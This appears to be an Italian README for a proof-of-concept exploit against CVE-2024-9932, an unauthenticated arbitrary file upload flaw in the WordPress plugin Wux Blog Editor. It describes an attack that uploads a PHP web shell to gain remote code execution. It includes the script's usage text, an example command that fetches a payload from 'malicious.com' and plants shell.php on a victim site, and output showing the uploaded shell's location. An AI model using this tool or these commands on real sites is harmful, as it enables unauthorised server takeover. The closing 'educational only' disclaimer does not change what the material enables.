
Exploit proof-of-concept per CVE-2024-9932, una vulnerabilità di upload arbitrario di file non autenticato nel plugin WordPress Wux Blog Editor, che consente l'esecuzione remota di codice tramite upload di file dannosi.
Il plugin WordPress Wux Blog Editor è vulnerabile al caricamento arbitrario di file a causa di una validazione insufficiente del tipo di file nella funzione wuxbt_insertImageNew. Sono interessate le versioni fino alla 3.0.0 inclusa. Questa vulnerabilità consente a utenti non autenticati di caricare file arbitrari sul server, portando potenzialmente all'esecuzione remota di codice (RCE).
La vulnerabilità deriva da una validazione impropria del tipo di file nella funzione wuxbt_insertImageNew. Ciò consente agli attaccanti di caricare file dannosi sul server senza autenticazione.
Scenario di attacco:
L'attaccante identifica un sito web che utilizza il plugin vulnerabile.
Sfrutta la funzionalità di caricamento file per caricare una shell PHP dannosa.
Esegue comandi sul server compromesso.
usage:CVE-2024-9932.py [-h] -u URL -ur REMOTE_URL [-n NAME]
Wux Blog Editor - Arbitrary File Upload
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress server, e.g., http://192.168.100.74/wordpress
-ur REMOTE_URL, --remote-url REMOTE_URL
Remote file URL, e.g., http://192.168.100.54/shell.txt
-n NAME, --name NAME Desired file name, e.g., Nxploit.php
python CVE-2024-9932.py -u http://victim-site.com/wordpress -ur http://malicious.com/payload.txt -n shell.php
Esempio di caricamento riuscito
1- File trovato:
2- Risultato dell'esecuzione: Naviga all'URL del file per eseguire il payload.
[+] File found: http://192.168.100.74/wordpress/wp-content/uploads/2025/01/shell.php
Questo strumento è solo a scopo educativo. L'uso non autorizzato di questo script su sistemi senza permesso è illegale.